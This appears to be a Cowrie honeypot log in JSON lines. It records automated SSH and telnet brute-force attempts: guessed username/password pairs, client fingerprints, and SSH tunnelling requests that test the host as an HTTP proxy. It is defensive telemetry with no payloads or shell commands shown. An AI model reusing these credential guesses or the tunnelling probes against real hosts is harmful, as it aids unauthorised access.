{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:41:52.513670Z","src_ip":"196.251.86.249","session":"0908db228810"}
{"eventid":"cowrie.login.failed","username":"user","password":"test","message":"login attempt [user/test] failed","sensor":"my-vps","timestamp":"2025-08-26T10:41:54.297364Z","src_ip":"196.251.86.249","session":"0908db228810"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:41:55.733479Z","src_ip":"196.251.86.249","session":"0908db228810"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":20760,"dst_ip":"1.2.3.4","dst_port":22,"session":"bc61dc27377b","protocol":"ssh","message":"New connection: 212.227.125.160:20760 (1.2.3.4:22) [session: bc61dc27377b]","sensor":"my-vps","timestamp":"2025-08-26T10:41:59.367006Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:41:59.368059Z","src_ip":"212.227.125.160","session":"bc61dc27377b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":21045,"dst_ip":"1.2.3.4","dst_port":22,"session":"e92bfcb5e6f3","protocol":"ssh","message":"New connection: 212.227.125.160:21045 (1.2.3.4:22) [session: e92bfcb5e6f3]","sensor":"my-vps","timestamp":"2025-08-26T10:41:59.480552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:41:59.481455Z","src_ip":"212.227.125.160","session":"e92bfcb5e6f3"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T10:41:59.594213Z","src_ip":"212.227.125.160","session":"e92bfcb5e6f3"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:41:59.935180Z","src_ip":"212.227.125.160","session":"e92bfcb5e6f3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T10:42:00.049074Z","session":"e92bfcb5e6f3"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":44005,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed83b7983c18","protocol":"ssh","message":"New connection: 213.209.150.239:44005 (1.2.3.4:22) [session: ed83b7983c18]","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.238469Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.239422Z","src_ip":"213.209.150.239","session":"ed83b7983c18"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.286425Z","src_ip":"213.209.150.239","session":"ed83b7983c18"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.521406Z","src_ip":"213.209.150.239","session":"ed83b7983c18"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":16267,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:16267","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.569243Z","session":"ed83b7983c18"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.616582Z","src_ip":"213.209.150.239","session":"ed83b7983c18"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":12478,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:12478","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.753500Z","session":"ed83b7983c18"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.800818Z","src_ip":"213.209.150.239","session":"ed83b7983c18"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:42:34.848991Z","src_ip":"213.209.150.239","session":"ed83b7983c18"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":44996,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e16e2573583","protocol":"ssh","message":"New connection: 196.251.86.249:44996 (1.2.3.4:22) [session: 2e16e2573583]","sensor":"my-vps","timestamp":"2025-08-26T10:42:54.690715Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:42:55.125188Z","src_ip":"196.251.86.249","session":"2e16e2573583"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:42:55.125871Z","src_ip":"196.251.86.249","session":"2e16e2573583"}
{"eventid":"cowrie.login.failed","username":"user","password":"test123","message":"login attempt [user/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:42:56.953351Z","src_ip":"196.251.86.249","session":"2e16e2573583"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:42:58.596706Z","src_ip":"196.251.86.249","session":"2e16e2573583"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:43:09.485508Z","src_ip":"212.227.125.160","session":"e92bfcb5e6f3"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":46434,"dst_ip":"1.2.3.4","dst_port":22,"session":"20a0f263e4bb","protocol":"ssh","message":"New connection: 196.251.86.249:46434 (1.2.3.4:22) [session: 20a0f263e4bb]","sensor":"my-vps","timestamp":"2025-08-26T10:43:56.032688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:43:57.499396Z","src_ip":"196.251.86.249","session":"20a0f263e4bb"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:43:57.500427Z","src_ip":"196.251.86.249","session":"20a0f263e4bb"}
{"eventid":"cowrie.login.failed","username":"user","password":"test321","message":"login attempt [user/test321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:43:59.695239Z","src_ip":"196.251.86.249","session":"20a0f263e4bb"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:44:01.404217Z","src_ip":"196.251.86.249","session":"20a0f263e4bb"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":47456,"dst_ip":"1.2.3.4","dst_port":22,"session":"88e98b6077e0","protocol":"ssh","message":"New connection: 196.251.86.249:47456 (1.2.3.4:22) [session: 88e98b6077e0]","sensor":"my-vps","timestamp":"2025-08-26T10:44:57.663834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:44:57.861072Z","src_ip":"196.251.86.249","session":"88e98b6077e0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:44:57.862124Z","src_ip":"196.251.86.249","session":"88e98b6077e0"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-26T10:44:59.231071Z","src_ip":"196.251.86.249","session":"88e98b6077e0"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:45:00.742708Z","src_ip":"196.251.86.249","session":"88e98b6077e0"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":47868,"dst_ip":"1.2.3.4","dst_port":22,"session":"16acfceb5e16","protocol":"ssh","message":"New connection: 196.251.86.249:47868 (1.2.3.4:22) [session: 16acfceb5e16]","sensor":"my-vps","timestamp":"2025-08-26T10:45:58.067235Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:45:58.710319Z","src_ip":"196.251.86.249","session":"16acfceb5e16"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:45:58.711029Z","src_ip":"196.251.86.249","session":"16acfceb5e16"}
{"eventid":"cowrie.login.failed","username":"user","password":"passwd","message":"login attempt [user/passwd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:46:01.004052Z","src_ip":"196.251.86.249","session":"16acfceb5e16"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:46:02.604180Z","src_ip":"196.251.86.249","session":"16acfceb5e16"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47504,"dst_ip":"1.2.3.4","dst_port":23,"session":"d2a7ec044f0e","protocol":"telnet","message":"New connection: 212.227.235.229:47504 (1.2.3.4:23) [session: d2a7ec044f0e]","sensor":"my-vps","timestamp":"2025-08-26T10:46:04.012465Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59158,"dst_ip":"1.2.3.4","dst_port":23,"session":"598d1a1fd7ad","protocol":"telnet","message":"New connection: 212.227.235.229:59158 (1.2.3.4:23) [session: 598d1a1fd7ad]","sensor":"my-vps","timestamp":"2025-08-26T10:46:26.298363Z"}
{"eventid":"cowrie.session.closed","duration":31.516042709350586,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:46:35.528438Z","src_ip":"212.227.235.229","session":"d2a7ec044f0e"}
{"eventid":"cowrie.session.closed","duration":12.829976558685303,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:46:39.128270Z","src_ip":"212.227.235.229","session":"598d1a1fd7ad"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":48496,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3e4ce239444","protocol":"ssh","message":"New connection: 196.251.86.249:48496 (1.2.3.4:22) [session: f3e4ce239444]","sensor":"my-vps","timestamp":"2025-08-26T10:46:58.418880Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:46:59.263025Z","src_ip":"196.251.86.249","session":"f3e4ce239444"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:46:59.263994Z","src_ip":"196.251.86.249","session":"f3e4ce239444"}
{"eventid":"cowrie.login.failed","username":"user","password":"pass","message":"login attempt [user/pass] failed","sensor":"my-vps","timestamp":"2025-08-26T10:47:01.133945Z","src_ip":"196.251.86.249","session":"f3e4ce239444"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:47:02.721021Z","src_ip":"196.251.86.249","session":"f3e4ce239444"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":48790,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffc9d924ec4c","protocol":"ssh","message":"New connection: 196.251.86.249:48790 (1.2.3.4:22) [session: ffc9d924ec4c]","sensor":"my-vps","timestamp":"2025-08-26T10:47:58.674022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:47:59.193277Z","src_ip":"196.251.86.249","session":"ffc9d924ec4c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@